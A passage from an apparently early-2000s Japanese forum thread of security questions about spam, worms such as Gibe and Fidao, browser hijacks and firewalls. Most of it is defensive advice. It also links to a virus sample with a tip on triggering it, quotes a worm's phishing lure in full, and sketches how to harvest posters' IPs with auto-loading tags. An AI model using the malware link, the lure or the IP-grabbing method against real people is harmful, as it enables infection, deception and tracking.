セキュアなサイトから読み込むと「セキュリティ情報の確認」のダイアログ出ますよね?
閲覧者側(ブラウザ)の設定をそのままに、サーバ側の設定で
その確認ダイアログが出ないようにする方法ってありますか?

ちなみに画像は、セキュリティをかけてないサイトからも
セキュアなサイトからも、ダイアログを出さずに参照できるようにしたいのです。
417名無しさん@お腹いっぱい。:02/03/08 22:55
age
418名無しさん@お腹いっぱい。:02/03/08 23:15
2ちゃんねらーの力で子供達を救おうよ(連日連夜 祭り開催中!)
何処の板から来たかを明記してくれると、みんなのやる気が上がります!
【クリック】 押してみっかな【クリック】http://live.2ch.net/test/read.cgi/festival/1015502074/l50
これを見て少しでも協力する気になった人
この文を色々な板にコピペしてくれると助かります
      
>>418
> この文を色々な板にコピペしてくれると助かります

誰がお前らなんか助けるか。
420名無しさん@お腹いっぱい。:02/03/09 01:36
2ちゃんねらーの力で子供達を救おうよ(連日連夜 祭り開催中!)
何処の板から来たかを明記してくれると、みんなのやる気が上がります!
【クリック】 押してみっかな【クリック】
http://live.2ch.net/test/read.cgi/festival/1015502074/l50
これを見て少しでも協力する気になった人
この文を色々な板にコピペしてくれると助かります

いつもスパ厨をヲチして 楽しんでいるヲチスレ住人の皆様も
たまには、善行はどうですか?
421名無しさん@お腹いっぱい。:02/03/09 03:35
ちょっとおしえてください
串チェックで 刺してるのに 兆候なしってなんでですか?
422 :02/03/09 04:55
>>421
情報を漏らす串なんでしょう
423名無しさん:02/03/09 19:22
下らん質問です。
携帯に毎日数通スパム送ってくる
[email protected]
を殺したいんですけど。
どうやら偽りメールではなさそう・・・。実在するみたい・・・。
424名無しさん:02/03/09 19:23
パッチあてると、ドライブのプロパティで文字化けします。

http://www.microsoft.com/japan/technet/security/bulletin/ms02-014ov.asp
MS02-014 に関する情報
「MS02-014: Windows Shell の未チェックのバッファにより、コードが実行される」

対象となる製品
Microsoft Windows 2000
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Server Edition
Microsoft Windows 98 Second Edition
Microsoft Windows 98
>>423
携帯からしこしこスパム打つやつはいないだろ。
そのアドレスは利用されてるだけかも知れない。
何も考えずに他人のメルアドを晒すなよ。バカか?
freemail と pub.to で賞金サイトに応募してるんだけど、
freemail の方はまったく来ないのに、pub.to のアドレスには
コレア方面からのスパムが満載。
どこから漏れてんだ?
428 :02/03/09 22:05
>>427
賞金サイト
429名無しさん@お腹いっぱい。:02/03/10 00:38
 
430名無しさん@お腹いっぱい。:02/03/10 01:02
近頃またsubjectがRe:のメールがよう来るようになったのですが、今更流行りだしたんですかアレ?
それとも単にヴァカが今更感染しただけなのですか?
教えろよゴルァ!!
431名無しさん@お腹いっぱい。:02/03/10 03:16
 
432 :02/03/10 03:37
>>430
バカのせいだろうな
433名無しさん@お腹いっぱい。:02/03/10 03:44
困っています。
悪名たかいYahooBBに加入しています。
3日前から、なぜかメールが受信できないんです。
YBBアカウントに関しては、受信できるのですが、
他のアカウントのメールを受信しようとすると、
ログオン画面が出て、「パスワード」を要求してきます。
(今まではそういうのが出たことはなかったです)
ツール<アカウント<サーバで確認してみると、
STMPのところがなぜか書き換わっていて12.0.0?みたいなみなれない番号が書いてありました。
(ほかのアカウントもそうなっていました)
これは、なにを意味するんでしょう?
気持ち悪さ爆発です…
どなたか教えてください.…
434433:02/03/10 03:48
つけくわえ。
メーラーはこれまた悪名たかい、OUTLOOKEXPRESSです。
OSはwin98。
さっき試してみたら、IEでページは見れているにもかかわらず、
OUTLOOKEXPRESSは、「現在インターネットに接続していません」などと
言ってきました…
恐ろしいです。
435 :02/03/10 03:54
>>433
他のアカウント用のを作り直せば?
あとウイルスチェックもしておきな
436433:02/03/10 04:07
レス、どうもです。
昨日、作り直したんですが、
今日見てみると、また書き換わっていたのです…
ウイルスチェックは、いま、やっているところ…

437427:02/03/10 12:50
>>428
すまん。懸賞サイトの間違い。
438名無しさん@お腹いっぱい。:02/03/10 14:47
あるサイトにアクセスしたらいきなり「インストールの準備をしてます」
の表示が現われて、その後ブラクラになりました。
なにかやばいソフトをインストールされている可能性はありませんか?
もしあるとしたらどんなソフトの可能性がありますか?
システムの復元を利用したのですが、そんなので元の状態になおすことは可能ですか?
inetnum: 61.187.0.0 - 61.187.255.255
netname: CHINANET-HN
descr: CHINANET Hunan province network
この中国人が延々とポートスキャンらしきことを(攻撃かも)
延々としてきて困ります。ルーターのログはこんな感じ。

2002年3月10日 14:01:41 Unrecognized access from 61.169.29.12:1258 to TCP port 80
2002年3月10日 14:09:02 Unrecognized access from 61.169.29.12:3992 to TCP port 80
2002年3月10日 14:09:06 Unrecognized access from 61.169.29.12:3992 to TCP port 80
2002年3月10日 14:11:22 Unrecognized access from 61.224.181.56:3726 to TCP port 80
2002年3月10日 14:11:25 Unrecognized access from 61.224.181.56:3726 to TCP port 80
2002年3月10日 14:30:15 Unrecognized access from 61.144.248.123:3250 to TCP port 80
2002年3月10日 14:30:18 Unrecognized access from 61.144.248.123:3250 to TCP port 80
2002年3月10日 14:33:41 Unrecognized access from 61.128.103.81:2401 to TCP port 80
2002年3月10日 14:33:44 Unrecognized access from 61.128.103.81:2401 to TCP port 80
2002年3月10日 14:40:30 Unrecognized access from 61.177.59.75:4063 to TCP port 80
2002年3月10日 14:40:33 Unrecognized access from 61.177.59.75:4063 to TCP port 80

こんな感じでかれこれ一月以上続いてます。
そのせいか、ネットが一時的に切れることが多々あり困っています。
どうすれば良いでしょう?
ログを貼られてもうざいのでやめる。
441439:02/03/10 15:32
>>440
すまん。
ADSL開通してFW入れたばかりで、
よくわかないんだがこいつはなにがしたいの↓
The firewall has blocked Internet access to your computer (ICMP Echo Request ('Ping')) from 217.172.210.96.
443 :02/03/10 18:30
>>442
よく勉強し直してくれ
pingを打たれてる
444cheshire-cat:02/03/10 18:31
>>442
ただ単に、君のIPアドレスが使われているかどうかチェックしただけ、イタリアから。
445名無しさん@お腹いっぱい。:02/03/10 21:40
ルータの内部時計が恐ろしく狂うので、定期的に自動で調整したいと思うのですが、
ルータの設定はtelnetとかではできなくて、httpのみで提供されています。
ルータ設定ページに行って、管理者のパスワードを入力して、正しい時刻を入力して、
「設定」ボタンを押すという処理を、自動でやってくれるようなソフトってないですか?
LinuxでもWindowsでも構いません。よろしくっす。
446名無しさん@お腹いっぱい。:02/03/10 21:43
会社でwingateとかゆーものを導入しましたが、
どのようなことができるものですか?
>>445
$locate time
449cheshire-cat:02/03/10 22:08
447の人の時間合わせについてのレス、446と書き込み時間が前後してブルブル。

マーフィーの法則のような。
450445:02/03/10 22:36
さっそくどうも。ていうかせっかくいただいたレスですが、申し訳ないことに、
意味がわからんす。locateでtimeのつくファイルを検索汁ってこと?
すまないすけど、もうちょっとヒントください。
>>450
$man -k time
452 :02/03/11 02:29
453 :02/03/11 02:47
イサオネットのトップにオンTVジャパンというテレビの番組表が
わかるのがあるんだけど、さっき見ようとしたら表示が変。
クラックされているの?
セガのHPのトップにあるオンTVジャパン何か変じゃない?
クラックされてるの???
http://www.ontvjapan.com/index.php3
454_:02/03/11 02:54
>>453
オミトロンとかつかってない?
455 :02/03/11 02:55
オミトロンとは?
オミトロングーグル見たけどよくわからなかった。
昨日まで普通に見れてたんだけどなぁ
あっ、見れた。さっきのはなんだったんだろ?
458名無しさん@お腹いっぱい。:02/03/11 04:15
なんか私のパソコンがこの頃よく固まるんですけど、ウイルスとかに感染している危険性ってありますか?
一日一回は固まります・・・
459 :02/03/11 06:56
>>458
ウイルスチェックしてみなよ
Shields UP !にてポートスキャンをする際の接続は
串を刺したままなのか、生なのかどちらですか?
>>460
生に決まってます
462 :02/03/11 22:13
 
463名無しさん@お腹いっぱい。:02/03/11 22:28
easyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3
をふんでしまいました。
ノートン先生が赤く光ってます。
今スキャンが終わったんですが、感染報告なしです。
いったいどうなっているのでしょうか?
感染してないんですかね。
464>>463:02/03/11 22:34
普通に落とせたけど
465cheshire-cat:02/03/11 22:42
>>463
それってエクステンションというか拡張子、mp3だよね。
ただ単にファイルにウイルスのコードがあるんで、チェックされただけかと。
METALLICA_SONG.MP3.pifにしてダブルクリックしたら感染するよ、確か。
466名無しさん@お腹いっぱい。:02/03/11 22:46
>>465
そうなんですか。ありがとうございます。
これについて調べたら危険度高とかなってるし、ガクガクでした。

>>464
ファイルが壊れててダウソできませんでした。

ありがとうございました。
>>458 9x系とかMeだったら固まるのは宿命の女。
>>467
宿命の女の の女 はいりませんね。
469cheshire-cat:02/03/11 23:04
>>467
うちのサブパソの98SE、固まらないよ。
使っているうちに、徐々に壊れていくんだろうね。
丸ごとバックアップで無傷。
さっき、変なメールが届いていました。
英文で、「このメールは届きませんでした」みたいなことが書いてあり、
Fromは、わたしのアドレス、To:[email protected]
となっていて、添付ファイルはHTML(IEマーク)とdatと、infファイルでした。
odnとは何のかかわりもないし、おくった覚えもないので、
開かずに削除しましたが、
この間からメーラー(outlookexpress)の調子も悪いし、
ちょっと気持ち悪いです。
環境はwin98、YBB(ADSL)、ノートンとゾーンアラームを入れています。
どうして、おくった覚えのないメールが帰ってくるのでしょう???
471470:02/03/12 00:36
つづき。
infの拡張子つきってあたりが、気持ち悪いです。
どなたか、どういう可能性があるのか、ご教授ください。
>>470
1 返信のフリをしているだけ。
2 知らないうちにトロイを仕込まれていたが、送り先のアカが削除された。
3 >>470の別人格が送った。
473470:02/03/12 02:12
>>472 レス、どうも。
1,2,3いずれにしても、
こわいっすねー。
とくに3、こわいです。
トロイは、とりあえず最新のデータでは検出されてないので。
削除しちゃったからくわしく調べられないのがくやしいけど…
474 :02/03/12 04:59
パソコンを起動するたびに自動的にネットにつながり
必ず2chのモーニング娘。の掲示板に行ってしまいます

「ぱちんこのうちあわせのほほんのほほん」とわけのわからない言葉が上に書いてあります
どうすればいいのでしょうか?
475おにいたま:02/03/12 05:52
>>474
電話線を抜くとインターネットに繋がらなくなります。
それか、リカバリをしてください。
476困ってます。:02/03/12 05:53
>474
私も同じです。
他板でも同じ質問を見かけましたが、まだ解決まで
いたらないようです。
IEを再インストールしたらウインドウの
pachinko utiawase nohohon nohohon
という文字は以前のように
Microsoft Internet Explorer
に戻ったのですが、起動するとやはりモ娘(狼)が開かれます。
ホームはYahooに設定してあるし、Web設定もリセットしましたが、
直りません。
ウイルススキャンにも引っかかりませんでした。
対処方法の分かる方がいらっしゃいましたらどうか
よろしくお願い致します。
PCはFUJITSU DESKPOWER C3/50 です。
477おにいたま:02/03/12 05:55
>>476
IEのインターネットオプションの、WEBの設定のリセット。
478おにいたま:02/03/12 05:55
>>476
Web設定のリセットしたのか・・・。
それなら、ここをみたらいい。
http://pc.2ch.net/test/read.cgi/pcqa/988993220/
479先生:02/03/12 10:02
お聞きします〜
Win XP proをDLしました。
交換でもないのにずっと繋いでてくれて・・・・
昨日までは相手の共有結構あったんですが今日見てみたら
サーバーはちゃんと接続されているのに共有0、情報応答しない状況です
かれこれ2日は繋ぎっぱなしなんだけどいい人じゃなくてやばい人??
XPは一番出回っているサイズです。
480 :02/03/12 10:07
>>479
犯罪者は自首しましょう
罪も軽くなります
いやなら死んでね
481名無しさん@お腹いっぱい。:02/03/12 10:41
>>479
このご時世、DOMにそれだけのモノを素直に落とさせてくれるのは
十中八九、トロイ入りに決まってんだろ。
482481:02/03/12 10:43
>>479
言い忘れたけど、ファイルサイズなんて簡単にねつ造出来るから
信用できないぞ。
483名無しさん@お腹いっぱい。:02/03/12 11:32
フリーのZoneAlramを使用していましたがこの度ウィルスバスター2002を導入するためアインストールしようとしましたが出来ません。VSNETUTILS.DLLというファイルが見つからないとのエラーが出ます。どうしたらよいのでしょうか?誰か教えていただけないでしょうか?
484名無しさん@お腹いっぱい。:02/03/12 13:52
>>483
ウィルスバスターのファイヤーウォールはあって無きに等しきもの。
それでもアンインストールすると言うなら止めないけど。
485名無しさん@お腹いっぱい。:02/03/12 16:20
HOTMAILについて質問です。
パスワードを忘れてしまいました。変更しようと思いましたが
パスワード変更の時に必要な質問の答えも忘れてしまいました。
大事なメールが入っている為、どうしても開きたいのですが無理です。
パスワードを解読する方法ってありますか?教えて下さい。
486 :02/03/12 17:03
>>485
ない
>>485
素直にHotmailに助けを求めればいいだろう。
なぜそうやって裏技方面を模索するんだ?
488 :02/03/12 22:32
 
>>487
485じゃないが、この条件なら無視されるのは明らか。それくらいわからんか?

>>458 無理。たとえ知っている奴がいたとしても教えるわけが無い。
あきらめろと言いたかった…
491名無しさん@お腹いっぱい。:02/03/13 01:55
ノートンインターネットセキュリティーにQ2に接続しないようにする機能ってついてます?
492名無しさん@お腹いっぱい。:02/03/13 02:08
Subjectが「Internet Security Update」。
送信元は「"Microsoft Corporation Security Center" <[email protected]>」。
添付ファイルとして「q216309.exe (162k)」がありました。
このようなメールを受け取った方いますか?
マイクロソフトから添付ファイルを寄越してくるとは思えないのですが・・・。
>>492
いかにも怪しい。そんなサービスをしてくれるような会社じゃないし^^;
494名無しさん@お腹いっぱい。:02/03/13 02:15
>>493
私もそう思います(^^;
ウイルススキャンには引っ掛かりませんでしたが、
バックドアが仕込まれたトロイではないかと思ってます。
495492:02/03/13 02:28
失礼しました。HAURIで引っ掛かりました(--;
I-Worm.Win32.Gibe
http://www.hauri.net/html/support/virus_info_read.html?uid=166

まかふぃ〜頼むよ(笑)
496493:02/03/13 02:41
>>495
バカフィィ!!!1000円で買ったんだけど、入れるのやめようかな・・・
でも無いよりは、ましか。
497492:02/03/13 02:43
いきなり添付ファイルを実行する人はいないと思いますが、
「Microsoft Corporation Security Center」を騙っているので警告。
添付ファイルはいわゆるトロイです。(下記参照)
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_GIBE.A

差出人:Microsoft Corporation Security Center
件名 :Internet Security Update
添付 :q216309.exe (162k)
本文の一部を転記します。
--
Microsoft Customer,

this is the latest version of security update, the
"7 Mar 2002 Cumulative Patch" update which eliminates all
known security vulnerabilities affecting Internet Explorer and
MS Outlook/Express as well as six new vulnerabilities, and is
discussed in Microsoft Security Bulletin MS02-005. Install now to
protect your computer from these vulnerabilities, the most serious of which
could allow an attacker to run code on your computer.
498493:02/03/13 02:51
普通は
Dear Customer,
ですね。
499名無しさん@お腹いっぱい。:02/03/13 02:55
ノートンアンチウイルス2002のウイルス定義ファイルの状態がエラーになってます。
最新版をDLしてもエラーのままです。
原因はわかりません。インストールしなおすしかないんでしょうか?
500492:02/03/13 03:06
>>499
こちらがシマンテック、テクニカルサポートのサイトです。
http://www.symantec.com/region/jp/support/index.html

問題解決の糸口になるでしょうか?
501名無しさん@お腹いっぱい。:02/03/13 03:23
学割パックのあるADSLのセキュリティソフトってありますか?
502名無しさん@お腹いっぱい。:02/03/13 03:40
うちにも1時間ほど前、ワームが添付されて届きました。
ファイルサイズは、492さんと同じくらい(149KB?)で、
試しにディスクに保存(デスクトップ上)してみようとしたら、
AGVが激しく反応。WORM_GIBE.A、ってとこまで一緒…
削除したけど。そのあと、ANTIDOTEも走らせたりして。
感染は防いだけど…
なんなんでしょう..
この間から変な添付ファイルがたくさん送られてくる…
ま、YBBだから仕方ないかな。



503名無しさん@お腹いっぱい。:02/03/13 03:47
editor-○○○○@eros.stoen.net

うざ〜〜〜〜〜〜〜〜〜!
最近スパムばっかり・・・・・・。
504名無しさん@お腹いっぱい。:02/03/13 03:48
ここ何日かネットの繋がりが悪いなと思っていて調べてみたら、接続先が
全然知らない番号になっていました。
ネットを始めたばかりなもので、かなりびびってます。
こっれってやばいですか?
今は通常の番号に戻したのですが・・・
>>504
環境は?
506504です。:02/03/13 04:12
電話回線につなげて、使うたびに接続するんですが、初心者なもので
環境は?という答えにあっているかわからないんですが・・・
激しく既出な内容かもしれないですが、見つからなかったので質問させてください。

セキュリティ関連サイトでは、ルータ+PFWソフトの使用を推奨していますが、
実際ルータで区切ったLAN環境内でPFWソフトを使用するメリットはあるんでしょうか?

当方自宅にてADSL接続をブロードバンドルータを使用し共有しており、PFWソフトを
導入するかどうかで悩んでいます。

有識者の皆様、マジレスお願い致します。
508名無しさん@お腹いっぱい。:02/03/13 04:43
さっきメールチェックしたら150通も届いてました。
読んでみると同じメール出さないで下さいという抗議の
メールばっかり。もちろん出した覚えはありません。
ウイルスバスター入ってるのですが何かに感染してるのでしょうか?
509名無しさん@お腹いっぱい。:02/03/13 06:37
教えてください。
先週自分のサイトの掲示板に○○○.jpgというアドレスが貼られていて、
それをクリックしたらOutlookExpressが100個以上開いたんです。
ブラクラの一種だろうと思いその記事を削除しただけでほっておいたのですが、
今日は掲示板を開いただけでOutlookexpressが105個も開きました。
開き終わったら普通に閉じることができるのですが、これってなんでしょうか?
相手のIPは164.41.2.21、開いてしまったOUTLOOKにはメールのあて先に
[email protected](数字が1ずつ違うものが105個)でした。
詳しい方教えてください。
510名無しさん@お腹いっぱい。:02/03/13 06:45
メールの送信者偽装ってできるんですか?
自分のアドレスが送信者だったんですけど
どうやるんでしょうか?
511cheshire-cat:02/03/13 07:35
>>509
リンク先がjpgじゃなくて実はhtmlファイルだったのかと。
そこにメールストーム仕掛けただけ。
>>510
ウイルス感染中、とか。
>>507 有識者ではないけれど、参考までに。

ルータ(タイプのADSLモデム)とPFW(Zone Alarm)を使用しています。
Zone導入は一月くらい前ですが、過去に二度ほどルータをかいくぐって、
PCまでやってきた攻撃(?)があります。Zoneでブロックしましたけど。

フリーのPFWは結構あるし、アンチウイルスとセットになってるのもあるので、
導入しても悪くはないと思います。
513509:02/03/13 08:29
>>511
ありがとうございます。
もう掲示板閉鎖します。
514507:02/03/13 12:33
>>512
マジレス感謝です。
ルータかいくぐって攻撃されることもあるんですね。
早速Zone Alarm入れてみます。
515質問:02/03/13 13:12
XPを2ヶ月前買ったばかりですぐにHikaruとMadokaを踏みました。
最近エンターキーの下あたりで不定期に「ゴロッ」という音がします。
しないときはしないし、するときは数十秒に一回ぐらいの頻度です。

これはウイルスと関係あるのでしょうか?タスクを覗いても
「ozawa.exe]は実行されていないようですが・・・。


516 :02/03/13 14:07
>>515
ウイルスチェックしてみな
517名無しさん@お腹いっぱい。:02/03/13 15:47
ハッキングって結局どのくらいのことができるんですか?
他人のハードディスクの中身を見たり盗んだりできるんですか?
518 :02/03/13 16:04
>>517
やろうと思えばどんなことでもできる
519しろ:02/03/13 16:41
企業系ネトオチしてます。IPについて質問しる。
pxxx-dnaxxsurugadai.tokyo.ocn.ne.jp
pxx-dnaxxsurugadai.tokyo.ocn.ne.jp
上記、メールのヘッダに付いてたIPと某掲示板にでてたIPなんだけど
かぎりなく上記IPは同一人物と考えてよいのかな?
また、数時間違いで同じIPでの掲示板書込みやメール送信があった
場合は同一人物の書き込みと判断して良いのかな?
書込んだ本人に聞いたらH''で書込んだって言うんだけど
H''で書込みしたら xx~ocn.ne.jp って掲示板に記録される可能性って
ありえる事なのかな?
教えてクンでスマンけど、以上3つ質問の回答お願いします
>>519
何のホストか分かりませんが、恐らくこうなってます。
pxxx-dnaxxsurugadai.tokyo.ocn.ne.jp
 |    |   |    |   |    |
 |    |   |    |   |    |
Aさん Bさん Cさん Dさん Eさん Fさん・・・
xxxの数だけ同じ構造のものがあると思いますので、
xxxが1と2では構成している人が全く違います。

その掲示板で見る限り「Aさん」と「Bさん他」の違いは全くありません。
メールのIDとヘッダのIPアドレス以外に「Aさん」と「Bさん他」の違いは殆どありません。

A1. メールと掲示板に関連性がなければ、同一人物とは言い難いです。
A2. 同じ条件の人が集中し難い(地域限定、ISP限定でない)掲示板なら
可能性は高いですが、断言は出来ません。
A3. H"=キャリア(ADSL、ISDN等、回線の一つ)≠ISPなので十分有り得ます。

ちなみにIPとは言いません、ホストネームと呼んであげてください。
「〜しる」とは「〜しろ」という意味です。
>>515
ここにもマルチしてたのね・・・ヽ(`Д´)ノ
522名無しさん@お腹いっぱい。 :02/03/13 23:53
ルータについて聞きたいのですが、どこの板に行けばいいのかな?
>>522
ルーターの何について知りたいのかで判断するべし。
無難なところでは、初級ネット、初心者、PC初心者あたり。

ここも万質問箱みたいなもんだけど。
524名無しさん@お腹いっぱい。@522:02/03/14 00:37
>>523
ありがとさんです。
お勧めのルーターがあれば教えて欲しいと思いまして・・・
AR320なんかは、どうでしょうか?
今、NTT-MEのBA5000SOHOなのですが、最悪なのです。
設定してもろくに動いてくれません。バーチャルホストも気分次第で
動く状態です・・・。
>>524
バーチャルホストが気分次第とは哀しすぎますな。
明確に求めるものがないと判断し辛いよ。

お勧めのブロードバンドルーターはどれ
http://pc.2ch.net/test/read.cgi/network/1002370082/
526教えてくん:02/03/14 03:56
質問です
ttp://210.189.80.26/~shock/musashi/cgi/muchakuchat.html

で配布してるパスチャ(ゆいちゃっと改)のログをのぞく方法がありましたら
セキュリティホールありそうですか?

VB厨なのでPerlはパーなのです
是非〜カワイイレベルですよね このぐらい

527名無しさん@お腹いっぱい。:02/03/14 05:33
「Internet Security Update」また来てるよ(^^;
Hotmailを利用している人はご注意を。
自動的に行ってくれるウイルスの検知には引っ掛かりません。
なんせ「まかふぃ〜」ですから・・・(笑)

【重要】添付ファイルはトロイです。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_GIBE.A
528名無しさん@お腹いっぱい。:02/03/14 05:42
こちらにも詳しく解説されています。
http://www.symantec.com/region/jp/sarcj/data/w/w32.gibe%40mm.html
529名無しさん@お腹いっぱい。:02/03/14 06:01
知らない間にウイルスに感染していたみたいで
マックの人にメールを送ったら「添付ファイルがついていて開いたらエラー」が
でたと…。
私はwinなんですけどマックにも感染するんでしょうか?
>>529
開いたらエラーって言うより、開こうとしたらエラーが出ます。
開けないのでエラーが出ます。
531名無しさん@お腹いっぱい。:02/03/14 12:43
うちの会社にメールウイルスが来たんだけど、
NAV コーポレートエディションにもひっかからない。
ひょっとして新種?

特徴だけど、メールのsubjectはなんと日本語で、
「重要なお知らせ」とか「Re: 例の件」とかになってる。
で、アドレス帳を読み込んでメールしまくるお決まりのタイプらしい。
本文は空っぽ。
添付書類として「patch.exe」という約13KBのファイルがついてる。

がいしゅつかもしれないけど、このウイルスのこと知ってる人いたら教えて!
Symantecにもトレンドマイクロにも全然情報がないみたい。
532sasa:02/03/14 13:02
うちにも「R:重要」できました、新種では?
533531:02/03/14 13:09
>>532
来ましたか! 
こちらは感染マシン3台出ました。
とりあえずイーサケーブル抜いて情報待ちですね…
534名無しさん@お腹いっぱい:02/03/14 13:13
>>531-532
おいらのところの社内でも開いたやつがいて、今、そのメールが飛びまくってます。
ほんと、どこ見ても情報が無い。
どなたか、情報щ(゚Д゚щ)クレ〜
535名無しさん@お腹いっぱい。:02/03/14 13:19
ハッキングは、侵入するだけで
基本的に何もしません

盗んだり、壊したりするのはクラッカーです。
536名無しさん@お腹いっぱい。:02/03/14 13:27
>>535
それがなにか?
537534:02/03/14 13:29
538531:02/03/14 13:38
>>537
おお!すごい!神!

でも、こいつ古いウイルスですね。しかも感染報告なしだって?
NAVの最新パターンファイルでもひっかからなかったってことは
亜種でしょうか?
539名無しさん@お腹いっぱい。:02/03/14 13:39
>>537
これの亜種だべ?
ウイルスバスターもノートンも全く反応しないYO!
540531:02/03/14 13:43
あ、いや、違った。そんなに古くなかった。
単にSymantecが未対応なだけ?
Webのウイルスデータベースにも記載されてなかったし。
日本語を用いて拡散するFidao

 アイ・ディフェンス・ジャパンからの情報によると、
新種のマスメーリングワーム「Fidao」が発見された。
このワームの特徴として、件名が日本語文字列 
(宛先メールアドレスが「.jp」ドメインの場合)またはImportant.
(宛先メールアドレスが上記以外の場合)となっており、
自身のSMTPエンジンを用いて電子メールを送信する機能を持っている。

http://headlines.yahoo.co.jp/hl?a=20020306-00000003-vgb-sci
542531:02/03/14 14:03
>>541
これ(の亜種)に間違いないみたいですね。
説明を見る限りでは、大したことなさそうに見えますけど
安心していいんですかね。
駆除ツールとか、パターンファイルの更新とかを待たなくても
添付されてきたexeファイルを捨ててしまえば終わりってことでしょうか?
543531:02/03/14 14:35
あ、スレ立ってますね。

【ウィルス警報】patch.exeに注意しる!
http://pc.2ch.net/test/read.cgi/sec/1016082075/

こっちのスレではここまでにします。ありがとうございました。
544名無しさん@お腹いっぱい。:02/03/14 16:44
winからマックにウイルス送ったら感染する?
>>544
マックにWindowsが入っていて実行できれば。
パソコンの電源はどうやって消せばいいのですか?
>>546
UPSが無いデスクトップパソコンならコンセントを抜けば停止します。
ノートパソコンは、バッテリーを抜いた上で上記措置を・・・
ネタにマジレス カコ(・∀・)イイ!!
549名無しさん@お腹いっぱい。:02/03/14 23:51
Subjectが「重要」「例の件」「極秘」「うんこ」といった思わせぶりな日本語に
なっている。

・・・「うんこ」って思わせぶりな日本語か?(w
550cheshire-cat:02/03/15 00:11
>>549
マニアな人には条件反射状態かと。
551教えてください:02/03/15 01:56
最近エロサイトウロウロしていたら、何かデフォルトの
ページがwww.pedo.wsとかになってしまったんです。
オプションで何度YahooとかMSNとかに書き換えても、
立ち上げなおすとまたそれに戻るんです。
どうすれば直るのでしょうか?
552ツグミ:02/03/15 05:15
教えてちゃんですみません。
とあるサイトの掲示板に、利用者が、荒らしに対してキレたらしく、
「裏でIP調べてアドレスをネット上に公開しますよ? 」
と言う書き込みをしていたのですが、これって、簡単に出来ることなんでしょうか?

本人は、「そういう仕事をしていたし、やるのは簡単」
「やる時はアシ付かないように出来るし、ヘマなんかしない。」と、
やけに意気込んでいるのですが・・・。
これって、合法的なんでしょうか?

ちなみにその人はそこの管理人でもない、只その掲示板で遊んでる一利用者なのですが・・・。
553名無しさん@お腹いっぱい。:02/03/15 05:54
公開PROXY規制中ってでることあるんですけど、
どういう事なんでしょう?
>>552
IP自体、そうそう固定IP持ってるブルジョアはいまいw
いろいろIP取る法はあるが
自分のアクセスログの取れるサイトなり鯖にアクセスさせることだ
タグの使えるBBSやチャットで自分の鯖なり(他人のものでも)アクセスさせていまえばよいのだよ
URL指定して自動で読み込むタグはいろいろあるでしょ
まっプロバイダが口割らければ 個人まではいかんべ

>>553
プロクシ=串には誰でも使えるものがある(公開)
それで来ると串のIPで認識される(匿名串なら)
串の設置者が口割らないと元が分からない(犯罪でもないかぎりログを見せる義務はない)

ただし、最初から串であるかは判別はできる
それをシャットアウトしているのだ

ちなみに自Web鯖があるように 串もお手軽に立てられる
他人に使わせてログを取り 弱みを握るやからもいるようだから
(大抵 ロクな目的で使ってないだろ オマエラ)
安易に公開串は使わないこと(・∀・)
>>552
簡単に出来るかどうかは知らんがIP晒してもそれほどダメージは無いと思われ。
実際IP表示する掲示板なんていくらでもあるし。
「そういう仕事をしていたし」ってのはワラタ。
個人的には、本当に出来る奴は宣言なんかしないと思う。
556ツグミ(552):02/03/15 06:35
>>554 >>555
教えていただいてありがとうございました。
参考になりました。
>>551
やられたな(・∀・)
IEかい?w
★ActiveXは安全だろうがなんだろうが無効!
★Javaも無効!
君のPCにはすでにプログラムが侵入して
IEのレジストリの書き換えを無効にされているのだ
IEならMSサイトにあるセキュリティパッチは全て入れておけ
それでもMSサイトに出てるのは遅いがな

☆スクリプトも無効が望ましいが、警告表示で必要なときだけ許す

こういうのはウイルスチェックでひっかかるかは疑問だな
おそらくWindowsにとっては正規のソフトと変わらんだろしなw
まあ入れられる前にチェックプログラム(ノートン先生とかw)
動かしてればわかったんだろうけどな

まあ IE削除(再インスト)→だめならHDDフォーマットしちまえ、OS再インストだ
それでもだみならプログラム詳しいやつしかダミだな(ここまでなら逆にすごいがなw)
それもオベンキョ〜(・∀・)




558名無しさん@お腹いっぱい。:02/03/15 07:14
ノートン先生とか入れても設定が分からなかったり、
セキュリティー警告でパニック起こす人(かつての俺)多いからなぁ。
みんなもっと勉強しませう。
559名無しさん@お腹いっぱい。:02/03/15 08:03
(・∀・)ウンコが北
>>557
ところどころ言ってることがムチャクチャなんだが。

>IEのレジストリの書き換えを無効にされているのだ
↑おそらく全然違う。
"レジストリを書き直す"ことによって元に戻るんだと思ふ。
「すでにレジストリの書き換えが無効」だなんて紛らわしいことは言わないで欲しい。

>>551
おかしいと思ったら直ぐにウィルススキャン
復旧作業はそれから。
マズはアプリの追加削除からIEを選択して"IEの修復"を試してみれ。
それでもダメなら、
MS-DOSモードで起動→"scanreg /restore"でレジストリを復元。
それでもダメならIE再インスト。
これでもまだダメな場合は最後の手段でC:\フォーマットしてOS再インスト。

>>556
99%の確率で「IP抜く」はカマかけてるんだと思ふ。
実際できるヤツはできるけど。
でもその人がそういう事をできるかどうかの判断は実は他人には判別できない。その為の情報がない。
(ちなみに、IPアドレスを晒す事は違法でもなんでもない)
で、話を戻して…、そう言われて荒らしがビビルかどうかを観察するのがその人の目的だったんだと思ふ(=ハッタリ)
しかし「IP抜くぞ」っていう平易な表現に騙されてはダメだと思ふんだよな。
スキルのあるヤツがアフォにも分かりやすい表現でわざとそう言ったのだと思えなくもない。
実際、管理者とかだったら簡単にできるだろうし。

そんな荒れる掲示板には行きたくないのが本音。
561名無しさん@お腹いっぱい。:02/03/15 08:42
掲示板で利用者が、IPを抜く方法を教えてください
あれこれ、7時間くらい
検索して 探したのですが全く見つかりません
別に、IPを抜いて悪いことをするのではなく
知的向上として知りたいのです。
もし、ここで言うのがマズイのであれば
何という言葉で、検索すれば出てくるのかを
教えてください
お願いします。
562名無しさん@お腹いっぱい。:02/03/15 09:03
564名無しさん@お腹いっぱい。:02/03/15 10:58
Outlook Expressでメールを読むを選ぶと勝手にメールを
開いてしまうので、件名を見てから開くどうか判断したい時は
どうすれいいですか。
565553:02/03/15 11:30
>>554
レスありがとうございます。パソコン歴半年位の勉強不足の者です。
私は公開串というものをなぜか使ってるということですか?
>>565
プロバイダが用意している鴨
567名無しさん@お腹いっぱい。:02/03/15 13:08
Win2k再インストールした。

ウィルス対策とファイアーウォール。

入れるならどれ?
568 :02/03/15 13:10
>>567
